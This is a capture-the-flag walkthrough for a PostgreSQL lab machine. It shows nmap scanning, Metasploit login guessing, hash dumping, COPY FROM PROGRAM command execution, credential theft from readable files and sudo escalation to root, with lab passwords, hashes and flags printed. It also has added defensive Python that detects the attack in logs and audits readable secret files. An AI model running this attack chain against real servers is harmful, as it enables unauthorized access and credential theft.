- http://thm.box.ip
- reveals an email signup box
- the basic command injection that I tried didn't reveal anything.
- I used an actual email address and clicked sign up and nothing came to my inbox
What is the rdbms installed on the server?
What port is the rdbms running on?
- nmap scan to probe the box network reveals the rdbms postgresql running on port 5432
```bash
┌─(kali㉿kali)-[~]
└─$ sudo nmap -p- -T4 -vv -O --min-rate 20000 -Pn 10.10.118.139
[sudo] password for kali:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-14 03:24 EDT
Initiating Parallel DNS resolution of 1 host. at 03:24
Completed Parallel DNS resolution of 1 host. at 03:24, 0.03s elapsed
Initiating SYN Stealth Scan at 03:24
Scanning 10.10.118.139 [65535 ports]
Discovered open port 22/tcp on 10.10.118.139
Discovered open port 80/tcp on 10.10.118.139
Increasing send delay for 10.10.118.139 from 0 to 5 due to 1669 out of 4171 dropped probes since last increase.
Increasing send delay for 10.10.118.139 from 5 to 10 due to 817 out of 2041 dropped probes since last increase.
Warning: 10.10.118.139 giving up on port because retransmission cap hit (6).
Discovered open port 5432/tcp on 10.10.118.139
Completed SYN Stealth Scan at 03:24, 11.63s elapsed (65535 total ports)
Initiating OS detection (try #1) against 10.10.118.139
Retrying OS detection (try #2) against 10.10.118.139
Retrying OS detection (try #3) against 10.10.118.139
Retrying OS detection (try #4) against 10.10.118.139
Retrying OS detection (try #5) against 10.10.118.139
Nmap scan report for 10.10.118.139
Host is up, received user-set (0.10s latency).
Scanned at 2023-10-14 03:24:44 EDT for 24s
Not shown: 61230 closed tcp ports (reset), 4302 filtered tcp ports (no-response)
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 61
80/tcp   open  http       syn-ack ttl 61
5432/tcp open  postgresql syn-ack ttl 61
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.013 days (since Sat Oct 14 03:07:03 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.25 seconds
           Raw packets sent: 221522 (9.751MB) | Rcvd: 69886 (2.799MB)
```
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
- fire up Metasploit and search for postgres
- auxiliary module that allows us to enumerate user credentials
- 9 auxiliary/scanner/postgres/postgres_login PostgreSQL Login Utility
```bash
msf6 > search postgres

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1   post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History
   2   exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   4   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   5   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   6   exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   7   exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   8   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   9   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
```
- use 9: set module to 9
- set -g rhosts ipaddr: set the RHOSTS option globally across modules
```bash
msf6 > use 9
msf6 auxiliary(scanner/postgres/postgres_login) > options
msf6 auxiliary(scanner/postgres/postgres_login) > set -g rhosts 10.10.78.111
msf6 auxiliary(scanner/postgres/postgres_login) > options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1        yes       The database to authenticate against
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt  no  File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true             no        Set to true to see query result sets
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             5432             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no  File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt  no  File containing users, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
```
What are the credentials you found?
- exploit: executes the module with the options you set
- reveals successful login with the credentials postgres:password
```bash
msf6 auxiliary(scanner/postgres/postgres_login) > exploit

[!] No active DB -- Credential data will not be saved!
[-] 10.10.51.200:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.51.200:5432 - Login Successful: postgres:password@template1
[-] 10.10.51.200:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.51.200:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
- search for postgres
- 11 auxiliary/admin/postgres/postgres_sql
- This module will reveal the postgresql rdbms version installed
```bash
msf6 auxiliary(scanner/postgres/postgres_login) > search postgres

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   11  auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
```
- use 11, options, set required fields user name and password
```bash
msf6 auxiliary(scanner/postgres/postgres_login) > use 11
msf6 auxiliary(admin/postgres/postgres_sql) > options

Module options (auxiliary/admin/postgres/postgres_sql):

   Name           Current Setting   Required  Description
   ----           ---------------   --------  -----------
   DATABASE       template1         yes       The database to authenticate against
   PASSWORD       postgres          no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true              no        Set to true to see query result sets
   RHOSTS         10.10.51.200      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          5432              yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres          yes       The username to authenticate as
   VERBOSE        false             no        Enable verbose output

msf6 auxiliary(admin/postgres/postgres_sql) > set username postgres
username => postgres
msf6 auxiliary(admin/postgres/postgres_sql) > set password password
password => password
```
- exploit
- reveals PostgreSQL 9.5.21 version
```bash
msf6 auxiliary(admin/postgres/postgres_sql) > exploit
[*] Running module against 10.10.51.200

Query Text: 'select version()'
==============================

    version
    -------
    PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit

[*] Auxiliary module execution completed
```
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
- 15 auxiliary/scanner/postgres/postgres_hashdump
```bash
msf6 auxiliary(admin/postgres/postgres_sql) > search postgre

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1   post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History
   2   exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   4   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   5   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   6   exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   7   exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   8   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   9   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   10  auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   11  auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   12  auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   13  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   14  exploit/windows/postgres/postgres_payload                   2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   15  auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
```
- use #15 and check options
- set password to password
- and exploit
```bash
msf6 auxiliary(admin/postgres/postgres_sql) > use 15
msf6 auxiliary(scanner/postgres/postgres_hashdump) > options

Module options (auxiliary/scanner/postgres/postgres_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS    10.10.51.200     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as

msf6 auxiliary(scanner/postgres/postgres_hashdump) > set password password
password => password
```
How many user hashes does the module dump?
- 6
```bash
msf6 auxiliary(scanner/postgres/postgres_hashdump) > exploit

[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
- 10 auxiliary/admin/postgres/postgres_readfile
```bash
msf6 auxiliary(scanner/postgres/postgres_hashdump) > search postgres

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1   post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History
   2   exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   4   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   5   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   6   exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   7   exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   8   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   9   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   10  auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
```
What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
- 6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec
```bash
msf6 > search postgres

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1   post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History
   2   exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   4   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   5   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   6   exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
```
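The password guessing run by postgres_login and the COPY FROM PROGRAM execution named above both leave entries in the PostgreSQL server log, so a defender can alert on them. The following Python detector is an added example, not part of the original walkthrough. The log settings (log_connections = on, log_statement = 'mod', log_line_prefix = '%m [%p] %h '), the sample log lines and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Assumed server settings (not from the page): log_connections = on,
# log_statement = 'mod', log_line_prefix = '%m [%p] %h '.
LINE = re.compile(r'^\S+ \S+ \S+ \[\d+\] (?P<host>\S+) [A-Z]+:\s+(?P<msg>.*)$')
FAILED = re.compile(r'password authentication failed for user "(?P<user>[^"]*)"')
AUTHORIZED = re.compile(r'connection authorized: user=(?P<user>\S+)')
COPY_PROGRAM = re.compile(r'statement:\s*COPY\b.*\bFROM\s+PROGRAM\b', re.IGNORECASE)

# Constructed sample log, not captured from the machine in this walkthrough.
SAMPLE_LOG = """\
2023-10-14 07:31:00.010 UTC [900] 127.0.0.1 LOG:  connection authorized: user=poster database=poster
2023-10-14 07:31:02.101 UTC [2101] 10.9.0.5 FATAL:  password authentication failed for user "scott"
2023-10-14 07:31:02.230 UTC [2102] 10.9.0.5 FATAL:  password authentication failed for user "scott"
2023-10-14 07:31:02.390 UTC [2103] 10.9.0.5 FATAL:  password authentication failed for user "admin"
2023-10-14 07:31:02.512 UTC [2104] 10.9.0.5 FATAL:  password authentication failed for user "postgres"
2023-10-14 07:31:02.655 UTC [2105] 10.9.0.5 FATAL:  password authentication failed for user "postgres"
2023-10-14 07:31:03.400 UTC [2106] 10.9.0.5 LOG:  connection authorized: user=postgres database=template1
2023-10-14 07:31:09.000 UTC [900] 127.0.0.1 LOG:  statement: COPY signups FROM '/tmp/import.csv';
2023-10-14 07:32:10.700 UTC [2130] 10.9.0.5 LOG:  statement: COPY "tmp_out" FROM PROGRAM 'id';
"""

def analyze(lines, min_failures=5, min_users=2):
    """Return alerts as (kind, client_host, user, failed_attempts) tuples."""
    failed = defaultdict(list)   # client host -> role names that failed so far
    alerts = []
    for raw in lines:
        m = LINE.match(raw.rstrip())
        if m is None:
            continue             # continuation lines and other prefixes are skipped
        host, msg = m.group("host"), m.group("msg")
        hit = FAILED.search(msg)
        if hit:
            failed[host].append(hit.group("user"))
            continue
        hit = AUTHORIZED.search(msg)
        if hit:
            tried = failed.get(host, [])
            # Many failures over several role names, then a success from the
            # same client: a guessed password rather than one user's typo.
            if len(tried) >= min_failures and len(set(tried)) >= min_users:
                alerts.append(("guessing_then_success", host,
                               hit.group("user"), len(tried)))
            continue
        if COPY_PROGRAM.search(msg):
            # COPY ... FROM PROGRAM runs an OS command as the server account.
            alerts.append(("copy_from_program", host, None, 0))
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(alert)
```

Counting here runs over whatever lines are supplied, so feed it one time window of the log at a time.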
Compromise the machine and locate user.txt
- using exploit/multi/postgres/postgres_copy_from_program_cmd_exec
- set username to postgres
- set password to password
- set lhost to tun0
- cat /etc/passwd reveals users Alison and Dark
```bash
postgres@ubuntu:/var/lib/postgresql/9.5/main$ cat /etc/passwd
cat /etc/passwd
#/home/dark/credentials.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
uuidd:x:107:111::/run/uuidd:/bin/false
alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dark:x:1001:1001::/home/dark:
```
- Alison has user.txt in their home dir but permission denied to postgres user
- following command to search system for user.txt and send 'permission denied' to garbage
```bash
postgres@ubuntu:/var/lib/postgresql/9.5/main$ find / -name user.txt 2>/dev/null
<stgresql/9.5/main$ find / -name user.txt 2>/dev/null
/home/alison/user.txt
```
- Dark has credentials.txt in their home dir with contents qwerty1234#!hackme
- su dark:qwerty1234#!hackme
```bash
postgres@ubuntu:/home/dark$ cat credentials.txt
cat credentials.txt
dark:qwerty1234#!hackme
```
- sudo -l: no root permissions
```bash
dark@ubuntu:~$ sudo -l
sudo -l
[sudo] password for dark: qwerty1234#!hackme
Sorry, user dark may not run sudo on ubuntu.
```
- enumerating what dark has access to
- find / -user dark 2>/dev/null | grep -v '/proc'
```bash
dark@ubuntu:~$ find / -user dark 2>/dev/null | grep -v '/proc'
find / -user dark 2>/dev/null | grep -v '/proc'
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/tasks
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release
/home/dark
/home/dark/.bashrc
/home/dark/.bash_logout
/home/dark/.profile
/home/dark/.bash_history
/home/dark/credentials.txt
/run/user/1001
/run/user/1001/systemd
/run/user/1001/systemd/private
/run/user/1001/systemd/notify
```
- find / -group dark 2>/dev/null
```bash
dark@ubuntu:~$ find / -group dark 2>/dev/null | grep -v '/proc'
find / -group dark 2>/dev/null | grep -v '/proc'
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/tasks
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release
/home/dark
/home/dark/.bashrc
/home/dark/.bash_logout
/home/dark/.profile
/home/dark/.bash_history
/home/dark/credentials.txt
/run/user/1001
/run/user/1001/systemd
/run/user/1001/systemd/private
/run/user/1001/systemd/notify
```
- digging around like a blind man looking for nickel
- /var/www/html/config.php
- reveals alison's password, shame shame we know your name.
```bash
dark@ubuntu:/var/lib/postgresql$ cat /var/www/html/config.php
cat /var/www/html/config.php
<?php

$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
```
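The pivot from postgres to dark to alison works because credentials.txt and config.php hold plaintext passwords that other local accounts can read. The following Python check is an added example, not part of the original walkthrough: it walks a directory and reports files that are readable by "other" and contain a password-like entry. The patterns, function names and sample files are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Heuristic patterns modelled on the two files in this walkthrough
# (assumption: extend them for your own stack).
SECRET_PATTERNS = {
    "php password assignment": re.compile(r'\$\w*pass\w*\s*=\s*["\'][^"\']+["\']', re.I),
    "user:password line": re.compile(r'^[A-Za-z_][\w-]*:[^\s:]{6,}$', re.M),
}

def audit_tree(root, max_bytes=65536):
    """Return sorted (path, mode, reason) for secret-bearing files 'other' can read."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            # Only regular files whose mode grants read to every local account.
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IROTH:
                continue
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read(max_bytes)
            except OSError:
                continue
            for reason, pattern in SECRET_PATTERNS.items():
                if pattern.search(text):
                    findings.append((path, oct(st.st_mode & 0o777), reason))
                    break
    return sorted(findings)

def write_sample(root, name, body, mode):
    """Create one constructed sample file with an explicit mode (ignores umask)."""
    path = os.path.join(root, name)
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, mode)
    return path

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as web_root:
        php = '<?php\n$dbpass = "constructed-value";\n'
        write_sample(web_root, "config.php", php, 0o644)        # flagged
        write_sample(web_root, "config_fixed.php", php, 0o640)  # owner and group only
        write_sample(web_root, "credentials.txt", "svcuser:constructed-secret\n", 0o644)
        for finding in audit_tree(web_root):
            print(finding)
```

Tightening the mode to 0640 with the web server's group only limits who can read the file; a database password that is also a login password with full sudo, as on this box, still needs to be changed.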
- using password to login to Alison
```bash
dark@ubuntu:/var/lib/postgresql$ su alison
su alison
Password: p4ssw0rdS3cur3!#
alison@ubuntu:/var/lib/postgresql$ cat /home/alison/user.txt
cat /home/alison/user.txt
THM{postgresql_fa1l_conf1gurat1on}
```
- using sudo -l to reveal Alison's sudo permissions shows that Alison can run sudo commands
```bash
alison@ubuntu:/var/lib/postgresql$ sudo -l
sudo -l
[sudo] password for alison: p4ssw0rdS3cur3!#
Matching Defaults entries for alison on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alison may run the following commands on ubuntu:
    (ALL : ALL) ALL
alison@ubuntu:/$ sudo su
sudo su
root@ubuntu:/#
root@ubuntu:/# cd root
cd root
root@ubuntu:~# ls -aslp
ls -aslp
total 24
4 drwx------  3 root root 4096 Jul 28  2020 ./
4 drwxr-xr-x 22 root root 4096 Jul 28  2020 ../
4 -rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
4 drwxr-xr-x  2 root root 4096 Jul 28  2020 .nano/
4 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4 -rw-r--r--  1 root root   49 Jul 28  2020 root.txt
root@ubuntu:~# cat root.txt
cat root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}
```